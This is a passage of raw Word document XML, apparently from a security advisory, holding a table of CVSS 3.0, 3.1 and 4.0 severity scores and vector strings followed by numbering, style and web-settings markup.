              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3796D911"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10 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="5EBAF33F" w14:textId="77777777" w:rsidTr="00BF4E67">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21B14E2C"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Environmental</w:t>
            </w:r>
          </w:p>
        </w:tc>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2A10B9F7"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10 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="79610535" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4512B2C5"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CVSS 3.0 Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="34278DCE" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A11B3B3"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CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="4DB38BB9" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C77DF04"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CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="307226F3" w14:textId="77777777" w:rsidTr="00BF4E67">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7C040801"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Base</w:t>
            </w:r>
          </w:p>
        </w:tc>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41B3F95C"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10 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="150274A7" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="264CFAAA"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Temporal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7239230C"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10 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="555FF510" w14:textId="77777777" w:rsidTr="00BF4E67">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1A41F6B9"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Environmental</w:t>
            </w:r>
          </w:p>
        </w:tc>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6FA2D8B1"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10 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="5DB25ECE" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D493CE7"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CVSS 3.1 Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="5BDB4CB9" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EEBEC77"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CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="3A30624A" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="071B3797"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CVSS 4.0 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="589373B5" w14:textId="77777777" w:rsidTr="00BF4E67">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6D3780D4"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Base</w:t>
            </w:r>
          </w:p>
        </w:tc>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05563DF4"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9.3 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="38435F08" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BCADE31"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Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20BAC5CF"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8.9 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="02991DC6" w14:textId="77777777" w:rsidTr="00BF4E67">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0BA17EAA"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Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>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4D85018B"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8.9 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="7F3CCD29" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4717D41A"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Vulnerable system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7830B280"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8.9 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="5A6721A6" w14:textId="77777777" w:rsidTr="00BF4E67">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5A97970D"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Subsequent system</w:t>
            </w:r>
          </w:p>
        </w:tc>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048AC2FD"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0.1 (Low)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="52E5F450" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4182D0EB"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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5295ABA0"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8.9 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="2B6E9613" w14:textId="77777777" w:rsidTr="00BF4E67">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5ADA7D13"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Security requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AFD1DD8"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8.9 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="6CBDFBFC" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C802FFE"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CVSS 4.0 Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="6E617D5B" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F78F525" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF4E67">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F28324E" w14:textId="77777777" w:rsidR="008D311C" w:rsidRDefault="008D311C">
      <w:bookmarkStart w:id="27" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:sectPr w:rsidR="008D3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976FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE76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C6B47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D50F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73630"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC722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4A1373"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A11A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E28F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C40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13E91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B98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17AFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="33FE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14EC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4E4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C50F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D354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95A25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEE8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417BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6106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B4CDE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39804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C7C7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9074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335AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C948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7230A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75AA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A7435"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B09C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A123FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F1A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C13CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4AE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16A58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20F8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DB52A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EA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2F3F6A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A1A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796862"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="888E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6878EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5302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F16B62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="953E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544CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="556C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541F09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D20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AD7545"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4790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3934E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CA83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1E173D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="526A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5E1E12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F10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B668D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="976E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861664"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="785C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E11A6C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5B6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470144"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9112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953C23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7656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AE0774"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60D0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D27842"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D8C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382669"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A850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C777B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02D6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BE11E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B56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EC540B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E128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697792"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0E8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AC3832"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="289A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296C0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E5C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3076E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C64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70583B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B64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AD533B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BC0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1D33BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1529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564DDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2724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883B75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D30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E93C77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6E2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EC33F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C7E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9"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="4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CA1"/>
    <w:rsid w:val="001E3CA1"/>
    <w:rsid w:val="0037635B"/>
    <w:rsid w:val="006C741E"/>
    <w:rsid w:val="008917BB"/>
    <w:rsid w:val="008D311C"/>
    <w:rsid w:val="00A927F1"/>
    <w:rsid w:val="00BF4E67"/>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E19D64-DA3B-4321-831F-AE17B6CC0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BF4E67"/>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BF4E67"/>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BF4E67"/>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link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00BF4E67"/>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4E67"/>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BF4E67"/>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BF4E67"/>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BF4E67"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BF4E6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BF4E67"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF4E67"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF4E6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F4E67"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF4E6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F4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BF4E67"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00BF4E67"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ccfg-unique-f98871-ca">
    <w:name w:val="ccfg-unique-f98871-ca"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00BF4E6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1569937">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1806199945">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="72435142">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
